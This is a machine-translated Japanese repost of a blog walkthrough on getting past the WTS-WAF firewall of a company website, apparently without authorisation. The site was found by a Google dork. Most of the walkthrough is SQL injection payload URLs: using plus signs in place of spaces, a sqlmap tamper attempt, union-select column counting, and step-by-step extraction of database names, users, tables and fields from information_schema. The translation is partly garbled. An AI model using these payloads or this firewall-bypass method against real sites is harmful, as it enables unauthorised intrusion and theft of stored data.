ホームページ > 運用・保守 > 安全性 > WTS-WAFをバイパスする分析を行う方法

WTS-WAFをバイパスする分析を行う方法

王林
リリース: 2023-05-13 09:40:12
転載
2060 人が閲覧しました


#0x01.ターゲットを探して

inurl:.php?id= intext:电器
ログイン後にコピー

電化製品会社のホームページを見つけ、何気なくテストしてみました、そして、wafがあることがわかりました

WTS-WAFをバイパスする分析を行う方法

WTS-WAFをバイパスする分析を行う方法

#これはまだ整理されていません(いくつかの情報を見つけました、記号を追加するだけのようです)スペースの代わりに、直接試してください)

0x02.Operation

WTS-WAFをバイパスする分析を行う方法

WAF インターセプトがないことが判明しました。

情報には、

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
ログイン後にコピー
ツールを試してみましたが、開始できないことがわかりました。

以上です...

WTS-WAFをバイパスする分析を行う方法# #0x03.Hand Note

http://*/*.php?id=1+and+1=1  #回显正常
http://*/*.php?id=1+and+1=2  #回显错误
说明存在注入

http://*/*.php?id=1+order+by+15  #15回显错误
http://*/*.php?id=1+order+by+14  #14回显正常
说明有14个字段

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面
ログイン後にコピー

WTS-WAFをバイパスする分析を行う方法 2 番目と 8 番目をエコーし​​ました

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户
一些常见的函数
version()  #显示数据库当前版本
database() / schema()  #显示当前数据库名
user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称
charset(str)  #返回字符串str的字符集
collation(str)  #返回字符串str的字符排列方式
ログイン後にコピー

0x04.Check data

爆発データベース

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1
ログイン後にコピー

它不能group_concat,那我就一个一个查了!
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #从2开始取一个
ログイン後にコピー
WTS-WAFをバイパスする分析を行う方法爆発データテーブル
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
ログイン後にコピー

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
ログイン後にコピー
WTS-WAFをバイパスする分析を行う方法爆発データ
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1
ログイン後にコピー

# #概要:

1. ツールを実行できない場合は、それを使用することしかできません。 注

2. mysql

のマニュアルのメモを練習してください。

以上がWTS-WAFをバイパスする分析を行う方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
ソース:yisu.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート